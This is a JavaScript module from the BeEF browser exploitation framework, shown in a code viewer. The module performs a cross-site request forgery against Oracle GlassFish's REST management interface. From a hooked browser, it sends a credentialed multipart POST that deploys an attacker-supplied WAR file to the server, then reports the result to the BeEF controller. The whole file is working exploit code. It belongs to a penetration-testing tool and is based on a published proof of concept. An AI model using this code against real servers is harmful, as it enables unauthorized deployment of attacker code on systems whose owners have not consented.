CoCalc -- command.js

GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/glassfish_war_upload_xsrf/command.js
¹⁸⁷³ views
1
//
2
// Copyright (c) 2006-2026Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7

8
//   This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com
9
//   For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html
10

11

12
beef.execute(function() {
13
  var restHost = '<%= @restHost %>';
14
  var warName = '<%= @warName %>';
15
  var warBase = '<%= @warBase %>';
16
	
17
  var logUrl = restHost + '/management/domain/applications/application';
18

19

20
  if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
21
    XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
22
      function byteValue(x) {
23
        return x.charCodeAt(0) & 0xff;
24
      }
25
    var ords = Array.prototype.map.call(datastr, byteValue);
26
    var ui8a = new Uint8Array(ords);
27
    this.send(ui8a.buffer);
28
    }
29
  }
30

31
  function fileUpload(fileData, fileName) { 
32
    boundary = "HELLOWORLD270883142628617", 
33
    uri = logUrl, 
34
    xhr = new XMLHttpRequest(); 
35
 
36
    var additionalFields = { 
37
      asyncreplication: "true", 
38
      availabilityenabled: "false", 
39
      contextroot: "", 
40
      createtables: "true", 
41
      dbvendorname: "", 
42
      deploymentplan: "", 
43
      description: "", 
44
      dropandcreatetables: "true", 
45
      enabled: "true", 
46
      force: "false", 
47
      generatermistubs: "false", 
48
      isredeploy: "false", 
49
      keepfailedstubs: "false", 
50
      keepreposdir: "false", 
51
      keepstate: "true", 
52
      lbenabled: "true", 
53
      libraries: "", 
54
      logReportedErrors: "true", 
55
      name: "", 
56
      precompilejsp: "false", 
57
      properties: "", 
58
      property: "", 
59
      retrieve: "", 
60
      target: "", 
61
      type: "", 
62
      uniquetablenames: "true", 
63
      verify: "false", 
64
      virtualservers: "", 
65
      __remove_empty_entries__: "true" 
66
    }
67

68
 
69
    var fileFieldName = "id"; 
70
    xhr.open("POST", uri, true); 
71
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
72
    xhr.withCredentials = "true"; 
73
    xhr.onreadystatechange = function() { 
74
      if (xhr.readyState == 4) {
75
	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Attempt to deploy \"' + warName + '\" completed.'); 
76
      } 
77
    } 
78
      
79
    var body = ""; 
80
      
81
    for (var i in additionalFields) { 
82
      if (additionalFields.hasOwnProperty(i)) { 
83
        body += addField(i, additionalFields[i], boundary); 
84
      } 
85
    } 
86
  
87
    body += addFileField(fileFieldName, fileData, fileName, boundary); 
88
    body += "--" + boundary + "--";
89
    xhr.setRequestHeader('Content-length', body.length); 
90
    xhr.sendAsBinary(body);
91
    return true; 
92
  } 
93
  
94
  function addField(name, value, boundary) { 
95
    var c = "--" + boundary + "\r\n" 
96
    c += 'Content-Disposition: form-data; name="' + name + '"\r\n\r\n'; 
97
    c += value + "\r\n"; 
98
    return c; 
99
  } 
100
  
101
  function addFileField(name, value, filename, boundary) { 
102
    var c = "--" + boundary + "\r\n" 
103
    c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n'; 
104
    c += "Content-Type: application/octet-stream\r\n\r\n";
105
    
106
    c += atob(value);
107

108
    c += "\r\n";
109
    return c;   
110
  } 
111
  
112
  
113
  function start() {
114
    fileUpload(warBase,warName);
115
  }
116

117
  start(); 
118

119
});
120

121

122
Product

Resources

Company
